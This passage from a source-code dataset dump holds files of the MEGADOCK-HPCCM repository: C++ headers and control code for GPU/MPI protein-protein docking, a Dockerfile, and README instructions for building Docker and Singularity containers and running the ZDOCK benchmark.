rfile.rfind(\"/\");\n\n if( ipr == (int) string::npos ) {\n break;\n } else {\n rfile = rfile.substr(ipr+1);\n }\n }\n\n ipr = rfile.rfind(\".\");\n rfile = rfile.substr(0,ipr);\n rfile = rfile + \"-\";\n\n while(1) {\n ipl = lfile.rfind(\"/\");\n\n if( ipl == (int) string::npos ) {\n break;\n } else {\n lfile = lfile.substr(ipl+1);\n }\n }\n\n ipl = lfile.rfind(\".\");\n lfile = lfile.substr(0,ipl);\n\n ofile = rfile + lfile + \".out\";\n _RLOut_file = ofile;\n ofile = rfile + lfile + \".detail\";\n _RLOut_file_detail = ofile;\n ofile = rfile + lfile + \".csv\";\n _RLOut_file_csv = ofile;\n\n return;\n}\n" }, { "alpha_fraction": 0.7313432693481445, "alphanum_fraction": 0.7611940503120422, "avg_line_length": 12.399999618530273, "blob_id": "1933bbffda110b492db54fa2cbe659c9ce77b154", "content_id": "162f7746904e1eac6f66da59b729ac1e72dd7426", "detected_licenses": [], "is_generated": false, "is_vendor": true, "language": "Dockerfile", "length_bytes": 67, "license_type": "permissive", "max_line_length": 22, "num_lines": 5, "path": "/.github/workflows/Dockerfile.hpccm", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "FROM python:3-alpine\n\nRUN pip3 install hpccm\n\nENTRYPOINT [\"hpccm\"]\n" }, { "alpha_fraction": 0.5331347584724426, "alphanum_fraction": 0.5420699715614319, "avg_line_length": 22.98214340209961, "blob_id": "4b82b7e6701396d86c2db2dc98aa74fac11ef499", "content_id": "736be6a971ae9624b8577e4ecff4511ee819681f", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1343, "license_type": "permissive", "max_line_length": 80, "num_lines": 56, "path": "/megadock-scfa20/application.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : Application\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef Application_h\n#define Application_h 1\n\n#include \"cpu_time.h\"\n#include \"exec_logger.h\"\n#include \"control_pdb.h\"\n#include \"control_table.h\"\n\nclass Application\n{\nprivate:\n Application(Application &c) {}\n const Application & operator=(const Application &c);\n\n int nproc2;\n int device_count_gpu;\n Parallel **_parallels;\n ExecLogger **_exec_loggers;\n ControlTable **_controls;\n ParameterTable **_parameters;\n\npublic:\n Application(const int nproc2) : nproc2(nproc2) {}\n virtual ~Application() {\n#pragma omp parallel for\n for (int i = 0; i < nproc2; i++) {\n delete _exec_loggers[i];\n delete _controls[i];\n delete _parallels[i];\n delete _parameters[i];\n }\n\n delete [] _parallels;\n delete [] _exec_loggers;\n delete [] _controls;\n delete [] _parameters;\n }\n virtual void initialize();\n virtual int application(int argc, char *argv[], int myid2);\n};\n\n#endif\n" }, { "alpha_fraction": 0.5989247560501099, "alphanum_fraction": 0.6075268983840942, "avg_line_length": 27.615385055541992, "blob_id": "5050a4180332ae5f9dcb7c35c55d4b93a528c96b", "content_id": "7019a11dfe2bd235351d472404be0be3817670b4", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1860, "license_type": "permissive", "max_line_length": 96, "num_lines": 65, "path": "/megadock-scfa20/control.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : Control\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef Control_h\n#define Control_h 1\n\n#include \"parallel.h\"\n#include \"receptor.h\"\n#include \"ligand.h\"\n#include \"docking_pdb.h\"\n#include \"docking_table.h\"\n\nusing namespace std;\n\ntemplate<class P, class D> class Control\n{\nprivate:\n Control(Control &c) {}\n const Control & operator=(const Control &c);\nprotected:\n Parallel *_parallel;\n P *_parameter;\n Receptor<P> *_receptor;\n Ligand<P> *_ligand;\n D *_docking;\n virtual void gridtable_11base_normal(int &ngrid,vector<int> &ngrid_table);\n virtual void gridtable_13base_normal(int &ngrid,vector<int> &ngrid_table);\n virtual void gridtable_07base_normal(int &ngrid,vector<int> &ngrid_table);\n virtual void gridtable_fftw_custom(int &ngrid,vector<int> &ngrid_table);\n virtual void gridtable_cufft_custom(int &ngrid,vector<int> &ngrid_table);\n virtual void autogridr(const int &ngrid,vector<int> &ngrid_table) = 0;\n virtual void autogridl(const int &ngrid,vector<int> &ngrid_table) = 0;\n virtual void checkgridr() = 0;\n virtual void checkgridl() = 0;\npublic:\n Control(Parallel *pparallel) : _parallel(pparallel) {\n#ifdef DEBUG\n cout << \"Constructing Control.\\n\";\n#endif\n }\n Control(Parallel *pparallel, P *pparameter) : _parallel(pparallel), _parameter(pparameter) {\n#ifdef DEBUG\n cout << \"Constructing Control.\\n\";\n#endif\n }\n virtual ~Control() {\n#ifdef DEBUG\n cout << \"Destructing Control.\\n\";\n#endif\n }\n virtual void execute() = 0;\n};\n\n#endif\n" }, { "alpha_fraction": 0.6872357726097107, "alphanum_fraction": 0.7027768492698669, "avg_line_length": 35.31120300292969, "blob_id": "a3bcb9262de743e99ea18fd66520c25dee239093", "content_id": "3678b3a472069805928f19f34475f0dbcca7b603", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 8843, "license_type": "permissive", "max_line_length": 253, "num_lines": 241, "path": "/README.md", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "# MEGADOCK-HPCCM\n\n## Description\n\nMEGADOCK-HPCCM is a HPC container making workflow for [MEGADOCK](https://github.com/akiyamalab/MEGADOCK) application on HPC environments by using [HPCCM (HPC Container Maker)](https://github.com/NVIDIA/hpc-container-maker/) framework.\nIt generates container specification (recipe) files both in [Dockerfile](https://docs.docker.com/engine/reference/builder/) and [Singularity definition](https://sylabs.io/guides/3.3/user-guide/definition_files.html) format from one simple python recipe.\nDependent libraries (GPU, OpenMPI, FFTW, InfiniBand, Intel Omni-Path) will be properly configured by setting parameters to use MEGADOCK application on HPC environments.\nIt gives users an easier way to use MEGADOCK application containers when considering the specification differences between the hosts and containers in multiple HPC environments.\n\n## Requirements\n\n- [NVIDIA GPU devices, drivers](https://www.nvidia.com/)\n- [HPC Container Maker](https://github.com/NVIDIA/hpc-container-maker/)\n- [Docker](https://www.docker.com/) (if you use)\n- [Singularity](https://sylabs.io/) (if you use)\n\n## Repository Overview\n```\n.\n├── data # \n│ └── ... # sample of input file (.pdb, .table)\n├── sample # \n│ ├── Dockerfile # for general Docker environments\n│ ├── singularity_ompi-2-1-2_opa.def # for TSUBAME3.0 (ompi=2.1.2, opa=True)\n│ └── singularity_ompi-2-1-6_ofed.def # for ABCI (ompi=2.1.6, ofed=True)\n├── script # \n| └── makeTable.sh # script for generating input table (.table)\n├── megadock-scfa20 # source code of MEGADOCK 5.0 (alpha)\n├── megadock_hpccm.py # MEGADOCK-HPCCM for HPCCM framework\n├── Makefile # \n└── README.md # this document\n\n# The following directories will be generated after running scripts\n.\n├── table # directory for storing metadata files\n└── out # directory for storing output files\n```\n\n----\n\n## Quick Links\n\n- [MEGADOCK-HPCCM](#megadock-hpccm)\n - [Description](#description)\n - [Requirements](#requirements)\n - [Repository Overview](#repository-overview)\n - [Quick Links](#quick-links)\n - [Docker Environment](#docker-environment)\n - [Requirements](#requirements-1)\n - [1. Setting up (HPCCM)](#1-setting-up-hpccm)\n - [2. Generate Dockerfile](#2-generate-dockerfile)\n - [3. Build Docker image](#3-build-docker-image)\n - [4. Test with sample protein-protein pairs](#4-test-with-sample-protein-protein-pairs)\n - [5. Test with ZLAB benchmark dataset](#5-test-with-zlab-benchmark-dataset)\n - [Singularity Environment](#singularity-environment)\n - [Requirements](#requirements-2)\n - [1. Setting up (HPCCM)](#1-setting-up-hpccm-1)\n - [2. Generate Singularity Definition](#2-generate-singularity-definition)\n - [3. Build Singularity image](#3-build-singularity-image)\n - [4. Test with sample protein-protein pairs](#4-test-with-sample-protein-protein-pairs-1)\n - [5. Test with ZLAB benchmark dataset](#5-test-with-zlab-benchmark-dataset-1)\n\n----\n\n## Docker Environment\n\n### Requirements\n\n- pip, python (for HPCCM)\n- docker ( > 19.03 )\n - or `nvidia-docker` for gpu support\n\n### 1. Setting up (HPCCM)\n\n```sh\n# install hpccm\nsudo pip install hpccm\n\n# clone MEGADOCK-HPCCM repository\ngit clone https://github.com/akiyamalab/megadock_hpccm.git\ncd megadock_hpccm\n```\n\n### 2. Generate Dockerfile\n\n``` sh\n# generate 'Dockerfile' from hpccm recipe\nhpccm --recipe megadock_hpccm.py --format docker > Dockerfile\n\n## or adding 'userarg' for specifying library versions\nhpccm --recipe megadock_hpccm.py --format docker --userarg ompi=2.1.2 fftw=3.3.8 > Dockerfile\n\n## Available userargs:\n## ompi=${ompi_version} : version of OpenMPI library\n## fftw=${fftw_version} : version of FFTW library\n```\n\n### 3. Build Docker image\n\n```sh\n# build a container image from Dockerfile\ndocker build . -f Dockerfile -t megadock:hpccm\n```\n\n### 4. Test with sample protein-protein pairs\n\n```sh\n# run with host gpus\ndocker run --rm -it --gpus all \\\n -v `pwd`/data:/data megadock:hpccm \\\n mpirun --allow-run-as-root -n 2 /workspace/megadock-gpu-dp -tb /data/SAMPLE.table\n```\n\n### 5. Test with ZLAB benchmark dataset\n\n```sh\n# clone MEGADOCK-HPCCM repository\ngit clone https://github.com/akiyamalab/megadock_hpccm.git\ncd megadock_hpccm\n\n# download benchmark dataset (ZDOCK Benchmark 5.0)\nmkdir -p data\nwget https://zlab.umassmed.edu/benchmark/benchmark5.tgz\ntar xvzf benchmark5.tgz -C data\nrm -f benchmark5.tgz\n\n# create docking table using script (only 100 pairs)\nINTERACTIVE=1 TABLE_ITEM_MAX=100 RUNTIME_RELATIVE_ROOT=/ script/makeTable.sh . data/benchmark5/structures/ \\*_r_b.pdb \\*_l_b.pdb test100pairs\n\n# Note: \n# - unset ${TABLE_ITEM_MAX} variable to unlimit the number of docking calculations (all-to-all)\n# - if you need to change the repository root path when runtime, use ${RUNTIME_RELATIVE_ROOT} to modify path in generating the table.\n\n# run\ndocker run --rm -it --gpus all \\\n -v `pwd`/data:/data -v `pwd`/table:/table -v `pwd`/out:/out \\\n megadock:hpccm \\\n mpirun --allow-run-as-root -n 2 -x OMP_NUM_THREADS=20 \\\n /workspace/megadock-gpu-dp -tb /table/test100pairs/test100pairs.table\n```\n\n----\n\n## Singularity Environment\n\n### Requirements\n\n- pip, python (for HPCCM)\n- singularity\n - require `singularity exec` command on HPC system\n - require privilege for `sudo singularity build` or `singularity build --fakeroot` (>= 3.3)\n\nNote: Following commands should be executed on your local environment where you have system privilege.\n\n### 1. Setting up (HPCCM)\n\n```sh\n# install hpccm\nsudo pip install hpccm\n\n# clone MEGADOCK-HPCCM repository\ngit clone https://github.com/akiyamalab/megadock_hpccm.git\ncd megadock_hpccm\n```\n\n### 2. Generate Singularity Definition\n\n``` sh\n# generate 'singularity.def' from hpccm recipe\nhpccm --recipe megadock_hpccm.py --format singularity > singularity.def\n\n## or adding 'userarg' for specifying library versions\nhpccm --recipe megadock_hpccm.py --format singularity --userarg ompi=2.1.6 fftw=3.3.8 ofed=True > singularity.def\n\n## Available userargs:\n## ompi=${ompi_version} : version of OpenMPI library\n## fftw=${fftw_version} : version of FFTW library\n## ofed=${True|False} : flag for install 'Mellanox OpenFabrics Enterprise Distribution for Linux'\n## opa=${True|False} : flag for install Intel Ompni-Path dependencies\n```\n\n### 3. Build Singularity image\n\n```sh\n# build a container image from Dockerfile\nsudo singularity build megadock-hpccm.sif singularity.def\n\n## or '.simg' format (singularity < 3.2)\nsudo singularity build megadock-hpccm.simg singularity.def\n```\n\n### 4. Test with sample protein-protein pairs\n\n- **Notes:**\n - Following commands should be running on HPC environment (compute-node with gpus).\n - Please replace `${SINGULARITY_IMAGE}` to **path to the container image file** on your environment.\n - **Please read the 'Singularity' section of system manual** which provided by your HPC system. We must add specific options for singularity runtime when using system resources.\n - e.g.) Volume option (`-B XXX`) for mounting system storage, applications, libraries, etc.\n\n```sh\n# clone MEGADOCK-HPCCM repository\ngit clone https://github.com/akiyamalab/megadock_hpccm.git\ncd megadock_hpccm\n\n# singularity exec \nsingularity exec --nv ${SINGULARITY_IMAGE} \\\n mpirun -n 2 /workspace/megadock-gpu-dp -tb data/SAMPLE.table\n```\n\n### 5. Test with ZLAB benchmark dataset\n\n```sh\n# clone MEGADOCK-HPCCM repository\ngit clone https://github.com/akiyamalab/megadock_hpccm.git\ncd megadock_hpccm\n\n# download benchmark dataset (ZDOCK Benchmark 5.0)\nmkdir -p data\nwget https://zlab.umassmed.edu/benchmark/benchmark5.tgz\ntar xvzf benchmark5.tgz -C data\nrm -f benchmark5.tgz\n\n# create docking table using script (only 100 pairs)\nINTERACTIVE=1 TABLE_ITEM_MAX=100 script/makeTable.sh . data/benchmark5/structures/ \\*_r_b.pdb \\*_l_b.pdb test100pairs\n\n# Note: \n# - unset ${TABLE_ITEM_MAX} variable to unlimit the number of docking calculations (all-to-all)\n# - if you need to change file path in compute-node, use ${RUNTIME_RELATIVE_ROOT} to modify path in generating the table.\n\n# ${SINGULARITY_IMAGE}: path to the singularity image file\n\n# singularity exec \nsingularity exec --nv ${SINGULARITY_IMAGE} \\\n mpirun -n 2 -x OMP_NUM_THREADS=20 \\\n /workspace/megadock-gpu-dp -tb table/test100pairs/test100pairs.table\n\n# singularity exec (with host MPI library)\nmpirun -n 2 -x OMP_NUM_THREADS=20 \\\n singularity exec --nv ${SINGULARITY_IMAGE} \\\n /workspace/megadock-gpu-dp -tb table/test100pairs/test100pairs.table\n```\n" }, { "alpha_fraction": 0.7308781743049622, "alphanum_fraction": 0.776203989982605, "avg_line_length": 38.22222137451172, "blob_id": "efa41b260525add55461ddb0fd6bc1b3b28aa107", "content_id": "205f010b8bab1225e192c0fc8ff63ae25df52b7b", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 354, "license_type": "permissive", "max_line_length": 116, "num_lines": 9, "path": "/megadock-scfa20/README.md", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "# MEGADOCK-scfa20\n\n## License\n\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n\n**This software and derivatives are NOT allowed for any commercial use without formal prior authorization.**\n\nCopyright © 2014-2019 Akiyama Laboratory, Tokyo Institute of Technology, All Rights Reserved.\n" }, { "alpha_fraction": 0.4863724410533905, "alphanum_fraction": 0.5072973370552063, "avg_line_length": 31.683908462524414, "blob_id": "ff0049817244961458a40656a354e4ae49cad182", "content_id": "de8cead00f825170b3444d3a100ec26869d6129c", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 11374, "license_type": "permissive", "max_line_length": 201, "num_lines": 348, "path": "/megadock-scfa20/control_table.cpp", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : ControlTable\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#include \"control_table.h\"\n\n//============================================================================//\nvoid ControlTable::initialize(bool verbose)\n//============================================================================//\n{\n struct timeval et1, et2;\n gettimeofday(&et1,NULL);\n\n // Number of processors limitation\n const int thread_limit = _parameter->_Num_thread_limit;\n const int gpu_limit = _parameter->_Num_GPU_limit;\n\n if(_parallel->nproc2() > thread_limit) {\n _parallel->nproc2(thread_limit);\n }\n\n if(_parallel->num_gpu() > gpu_limit || _parallel->num_gpu() > _parallel->nproc2()) {\n _parallel->num_gpu( min(gpu_limit, (int)_parallel->nproc2()) );\n }\n if (verbose)\n printf(\"# Using %3d CPU cores, %d GPUs\\n\\n\", _parallel->nproc2(), _parallel->num_gpu());\n\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t1_initialize += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n}\n\n//============================================================================//\n#ifdef MPI_DP\nvoid ControlTable::prepare()\n#else\nvoid ControlTable::prepare(string rec_file, string lig_file, string out_file)\n#endif\n//============================================================================//\n{\n int ngrid;\n vector<int> ngrid_table;\n\n struct timeval et1, et2;\n gettimeofday(&et1,NULL);\n\n#ifdef MPI_DP\n string rec_file = _parameter->_RecPDB_file;\n string lig_file = _parameter->_LigPDB_file;\n#else\n if (out_file == \"\") {\n _parameter->output_file_name(rec_file, lig_file);\n } else {\n string detail_ext = \".detail\", csv_ext = \".csv\";\n _parameter->_RLOut_file = out_file;\n _parameter->_RLOut_file_detail = out_file+detail_ext;\n _parameter->_RLOut_file_csv = out_file+csv_ext;\n if(_parameter->_RLOut_file.length() > 4) {\n if(_parameter->_RLOut_file.substr(_parameter->_RLOut_file.length()-4)==\".out\") {\n _parameter->_RLOut_file_detail = _parameter->_RLOut_file.substr(0,_parameter->_RLOut_file.length()-4)+detail_ext;;\n _parameter->_RLOut_file_csv = _parameter->_RLOut_file.substr(0,_parameter->_RLOut_file.length()-4)+csv_ext;;\n }\n }\n }\n#endif\n // Receptor<ParameterTable>\n _receptor = new Receptor<ParameterTable>(rec_file);\n _exec_logger->rec_filename = rec_file;\n _receptor->initialize(_parameter);\n _exec_logger->record_malloc( sizeof(float)*_receptor->num_atoms()*3 ); //Atom coordinate\n\n // Ligand<ParameterTable>\n _ligand = new Ligand<ParameterTable>(lig_file);\n _exec_logger->lig_filename = lig_file;\n _ligand->initialize(_parameter);\n _exec_logger->record_malloc( sizeof(float)*_ligand->num_atoms()*3 ); //Atom coordinate\n\n _exec_logger->_Num_fft_flag = _parameter->_Num_fft_flag;\n if( !_parameter->_Num_fft_flag ) {\n switch (_parameter->fft_base_set) {\n case 13:\n gridtable_13base_normal(ngrid,ngrid_table);\n break;\n case 7:\n gridtable_07base_normal(ngrid,ngrid_table);\n break;\n case 11:\n gridtable_11base_normal(ngrid,ngrid_table);\n break;\n case 0:\n gridtable_fftw_custom(ngrid,ngrid_table);\n break;\n case 1:\n gridtable_cufft_custom(ngrid,ngrid_table);\n break;\n }\n autogridr(ngrid,ngrid_table);\n autogridl(ngrid,ngrid_table);\n } else {\n checkgridr();\n checkgridl();\n }\n\n // DockingTable\n _docking = new DockingTable(_exec_logger,_parallel,_parameter,_receptor,_ligand);\n _docking->initialize();\n\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t1_initialize += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n}\n\n//============================================================================//\nvoid ControlTable::autogridr(const int &ngrid,vector<int> &ngrid_table)\n//============================================================================//\n{\n int num_grid = 1;\n float size, size_rec = 0.0;\n\n for( int i = 0 ; i < 3 ; i++ ) {\n size = _receptor->edge(i,1) - _receptor->edge(i,0);\n \n //printf(\" %f, %f\\n\",_receptor->edge(i,1),_receptor->edge(i,0));\n\n if( size > size_rec ) {\n size_rec = size;\n }\n }\n\n _exec_logger->rec_max_size = size_rec;\n\n size_rec += 2.0 * _parameter->_Grid_space_rec;\n _exec_logger->rec_voxel_size = size_rec;\n\n num_grid = 1 + int(size_rec / _parameter->grid_width);\n\n for( int i = 0 ; i < ngrid ; i++ ) {\n if( ngrid_table[i] >= num_grid ) {\n num_grid = ngrid_table[i];\n break;\n }\n }\n\n _receptor->num_grid(num_grid);\n _exec_logger->rec_num_grid = num_grid;\n\n return;\n}\n\n//============================================================================//\nvoid ControlTable::autogridl(const int &ngrid,vector<int> &ngrid_table)\n//============================================================================//\n{\n int num_grid = 1;\n float size_lig = 0.0;\n float x1, y1, z1, x2, y2, z2, d2;\n const int na = _ligand->num_atoms();\n\n for( int i = 0 ; i < na-1 ; i++ ) {\n x1 = _ligand->coordinate(i,0);\n y1 = _ligand->coordinate(i,1);\n z1 = _ligand->coordinate(i,2);\n\n for( int j = i+1 ; j < na ; j++ ) {\n x2 = _ligand->coordinate(j,0);\n y2 = _ligand->coordinate(j,1);\n z2 = _ligand->coordinate(j,2);\n\n d2 = (x2-x1)*(x2-x1) + (y2-y1)*(y2-y1) + (z2-z1)*(z2-z1);\n\n if( d2 > size_lig ) {\n size_lig = d2;\n }\n }\n }\n\n size_lig = sqrt(size_lig);\n _exec_logger->lig_max_size = size_lig;\n\n size_lig += 2.0 * _parameter->_Grid_space_lig;\n _exec_logger->lig_voxel_size = size_lig;\n \n _parameter->ligand_max_edge = size_lig;\n\n num_grid = 1 + int(size_lig / _parameter->grid_width);\n\n for( int i = 0 ; i < ngrid ; i++ ) {\n if( ngrid_table[i] >= num_grid ) {\n num_grid = ngrid_table[i];\n break;\n }\n }\n\n _ligand->num_grid(num_grid);\n _exec_logger->lig_num_grid = num_grid;\n\n return;\n}\n\n//============================================================================//\nvoid ControlTable::checkgridr()\n//============================================================================//\n{\n float size, size_rec = 0.0;\n const int num_grid = _parameter->_Num_grid;\n const float search_length = _parameter->grid_width * num_grid;\n\n for( int i = 0 ; i < 3 ; i++ ) {\n size = _receptor->edge(i,1) - _receptor->edge(i,0);\n\n if( size > size_rec ) {\n size_rec = size;\n }\n }\n\n _exec_logger->rec_max_size = size_rec;\n\n size_rec += 2.0*_parameter->_Grid_space_rec;\n _exec_logger->rec_voxel_size = size_rec;\n\n if( size_rec > search_length ) {\n cerr << \"[ERROR] Receptor data is too big!!\\n\";\n exit(1);\n }\n\n _receptor->num_grid(num_grid);\n _exec_logger->rec_num_grid = num_grid;\n\n\n return;\n}\n\n//============================================================================//\nvoid ControlTable::checkgridl()\n//============================================================================//\n{\n float size_lig = 0.0;\n float x1, y1, z1, x2, y2, z2, d2;\n const int na = _ligand->num_atoms();\n const int num_grid = _parameter->_Num_grid;\n const float search_length = _parameter->grid_width * num_grid;\n\n for( int i = 0 ; i < na-1 ; i++ ) {\n x1 = _ligand->coordinate(i,0);\n y1 = _ligand->coordinate(i,1);\n z1 = _ligand->coordinate(i,2);\n\n for( int j = i+1 ; j < na ; j++ ) {\n x2 = _ligand->coordinate(j,0);\n y2 = _ligand->coordinate(j,1);\n z2 = _ligand->coordinate(j,2);\n\n d2 = (x2-x1)*(x2-x1) + (y2-y1)*(y2-y1) + (z2-z1)*(z2-z1);\n\n if( d2 > size_lig ) {\n size_lig = d2;\n }\n }\n }\n\n size_lig = sqrt(size_lig);\n _exec_logger->lig_max_size = size_lig;\n\n size_lig += 2.0*_parameter->_Grid_space_lig;\n _exec_logger->lig_voxel_size = size_lig;\n\n if( size_lig > search_length ) {\n cerr << \"[ERROR] Ligand data is too big!!\\n\";\n exit(1);\n }\n\n _ligand->num_grid(num_grid);\n _exec_logger->lig_num_grid = num_grid;\n\n _exec_logger->grid_width = _parameter->grid_width;\n\n return;\n}\n\n//============================================================================//\nvoid ControlTable::execute()\n//============================================================================//\n{\n struct timeval et1, et2;\n\n gettimeofday(&et1,NULL); // Receptor process (voxelization, forward FFT of Receptor)\n _docking->rec_init();\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t2_receptor_process += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n gettimeofday(&et1,NULL); // docking\n _docking->dockz();\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t3_docking_total += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n if(_parameter->detail_output_flag == 1) { // detailed result output\n gettimeofday(&et1,NULL);\n _docking->output_detail();\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t4_docking_output_detail += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n }\n\n if(_parameter->calc_time_log_output_flag >= 1) { // calculation info\n _docking->output_calc_time_log();\n }\n\n gettimeofday(&et1,NULL); // normal result output\n _docking->output();\n gettimeofday(&et2,NULL);\n _exec_logger->_cputime->t5_docking_output += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n _docking->dock_memory_free();\n\n const int ng1 = _parameter->_Num_grid;\n const int ng3 = ng1*ng1*ng1;\n const int nf1 = ng1*2;\n const int nf3 = nf1*nf1*nf1;\n const int nproc2 = _parallel->nproc2();\n const int natom = _parameter->_Num_atom_max;\n const int nag = natom * ng1;\n const size_t _Memfw = ng3*3+natom*3+nag*3;\n const size_t _Memiw = ng3*2+natom*4;\n\n //delete docking include delete fft_process, _FFT_rec_r/i[nf3], _FFTWin/out[nf3*nproc2]\n _exec_logger->record_free( sizeof(float)*nf3*2 + sizeof(fftwf_complex)*nf3*2*nproc2);\n#ifdef CUFFT\n _exec_logger->record_free( sizeof(cufftComplex)*nf3*2 ); //_in/outBuf\n#endif\n _exec_logger->record_free( sizeof(float)*_Memfw*nproc2 + sizeof(int)*_Memiw*nproc2 ); //_F/Iwork\n delete _docking;\n _exec_logger->record_free( sizeof(float)*_ligand->num_atoms()*3 );\n delete _ligand;\n _exec_logger->record_free( sizeof(float)*_receptor->num_atoms()*3 );\n delete _receptor;\n _exec_logger->record_free( sizeof(float)*_parameter->_Num_rot_angles*3 + sizeof(unordered_map<string,float>)*(_parameter->_Charmmr.size() + _parameter->_Charmmc.size() + _parameter->_ACE.size()) );\n //delete _parameter;\n\n\n return;\n}\n" }, { "alpha_fraction": 0.5095164775848389, "alphanum_fraction": 0.5169752836227417, "avg_line_length": 28.67938995361328, "blob_id": "1275b67380ec0ca8a7105438ff90d5454197fba0", "content_id": "2199b2c7783221d8b0ce541bc8728c74b01c5d3b", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3888, "license_type": "permissive", "max_line_length": 195, "num_lines": 131, "path": "/megadock-scfa20/parameter.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : Parameter\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef Parameter_h\n#define Parameter_h 1\n\n#include <string>\n#include <iostream>\n#include <fstream>\n#include <sstream>\n#include <vector>\n#include <unordered_map>\n#include <cassert>\n#include <unistd.h>\n\n#include \"constant.h\"\n#include \"parallel.h\"\n\nusing namespace std;\n\nclass Parameter\n{\nprivate:\n friend class ControlPDB;\n template<class P, class F> friend class Docking;\n template<class P> friend class FFTProcess;\n friend class ControlTable;\n Parameter(Parameter &c) {}\n template<class P> friend class Protein;\n const Parameter & operator=(const Parameter &c);\n Parallel *_parallel;\n\nprotected:\n string _RLOut_file;\n string _RLOut_file_detail; \n string _RLOut_file_csv;\n string\t\t\t calc_id;\n int detail_output_flag;\n int calc_time_log_output_flag;\n\n int _Num_grid;\n int _Num_fft;\n int _Num_fft_flag;\n int\t\t\t\t _Num_atom_max;\n int _Num_output;\n int _Num_output_flag;\n int _Num_thread_limit;\n int _Num_GPU_limit;\n\n int _Score_func;\n int _Num_sort;\n float _Elec_ratio;\n float _ACE_ratio;\n float grid_width;\n float ligand_max_edge;\n int _Rotation_angle_set;\n int fft_base_set;\n int lig_elec_serial_flag;\n int\t\t\t\t fft_library_type;\n\n int\t\t\t\t tem_flag1;\n int\t\t\t\t tem_flag2;\n int\t\t\t\t tem_flag3;\n int\t\t\t\t tem_flag4;\n int f1_flag;\n int f2_flag;\n\n int _Old_voxel_flag;\n float _Grid_space_rec;\n float _Grid_space_lig;\n //rPSC tuning\n float _rPSC_param_rec_core;\n float _rPSC_param_lig_core;\n\n float *_Zangle;\n int _Num_rot_angles;\n unordered_map<string,float> _Charmmr;\n unordered_map<string,float> _Charmmc;\n unordered_map<string,float> _ACE;\n virtual void default_param();\n virtual void parameter_set();\n virtual void charmm_radius();\n virtual void charmm_charge();\n virtual void ace_value();\n virtual void dangle_rot1();\n virtual void dangle_rot3();\n virtual void dangle_rot24();\n virtual void dangle_rot360();\n virtual void dangle_rot3600();\n virtual void dangle_rot54000();\n\npublic:\n Parameter(Parallel *pparallel) : _parallel(pparallel) {\n#ifdef DEBUG\n cout << \"Constructing Parameter.\\n\";\n#endif\n }\n virtual ~Parameter() {\n#ifdef DEBUG\n cout << \"Destructing Parameter.\\n\";\n#endif\n delete [] _Zangle;\n }\n#ifdef MPI_DP\n virtual void initialize();\n#else\n virtual void initialize(int argc,char *argv[]);\n#endif\n virtual void process_args(int argc,char *argv[]) = 0;\n virtual float atom_radius(const string &atype);\n virtual float atom_charge(const string &atype);\n virtual float atom_ace(const string &atype);\n virtual int allocate_size() {\n return sizeof(float)*_Num_rot_angles*3 + sizeof(unordered_map<string,float>)*(this->_Charmmr.size() + this->_Charmmc.size() + _ACE.size()); //Rotation angles[], Atom radius, charge, ACE[]\n }\n};\n\nvoid usage();\n\n#endif\n" }, { "alpha_fraction": 0.6063183546066284, "alphanum_fraction": 0.6111786365509033, "avg_line_length": 27.379310607910156, "blob_id": "e7a3b5a4f546936d4c96fc303e84d85a497f118b", "content_id": "1a72f6d76940e173d34fa82a762ce818f79f7876", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": 